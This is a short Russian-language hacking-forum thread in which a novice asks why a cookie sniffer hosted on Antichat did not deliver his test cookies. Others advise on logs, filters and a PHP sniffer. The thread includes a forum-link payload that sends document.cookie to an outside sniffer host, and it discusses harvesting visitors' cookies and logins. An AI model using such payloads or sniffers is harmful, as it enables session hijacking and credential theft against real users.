• XSS.stack #1 – первый литературный журнал от юзеров форума

Сниффер на Античате?

Reanimator

RAID-массив
Пользователь
Реакции
0
Здраствуйте! Я думаю что кто-то из вас хоть когда-нибудь пользовался сниффером на Античат.ру. Вот у меня вопрос. Решил я потестить этот сниффер, но результата не получил. У меня есть свой сайт на народе и там есть форум(ессно не народовский) и вот я решил запостить сообщение в котором написал теги
[урл]"http://antichat.ru/cgi-bin/s.jpg?+document.cookie;[/урл]. Появилась ссылка на этот адрес. Я подписался на рассылку на античате. Я нажал на ссылку и у меня загрузился гиф 1*1 пикселей, но на мыло мои куки не пришли, что я не прально делаю?

Ты за логами лучше следи, а непришли куки наверно из-за того, что неправильный фильтр указал, при подписке. А вообще лучше юзай свой сниффер...

Попробуй наш PHP сниффак.
Я бы с радостью, только не понимаю как он работает. Объясни, плиииз?

А че он мне токо айпи показывает это и все чтоли, а где логин например узнать?

Reanimator
Лолик, если у чела стоят куки для данного хоста они будут в Квери стринг. А если нет, то ИП и дата. А логина и пасса ты там не увидишь - они в куки шифруются.

Лолик, если у чела стоят куки для данного хоста они будут в Квери стринг. А если нет, то ИП и дата. А логина и пасса ты там не увидишь - они в куки шифруются.
Не ну мне хотя бы в хеше!!!

Ну кароче лана забей, а не знаешь какие фильтры на античате ставить надо?

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх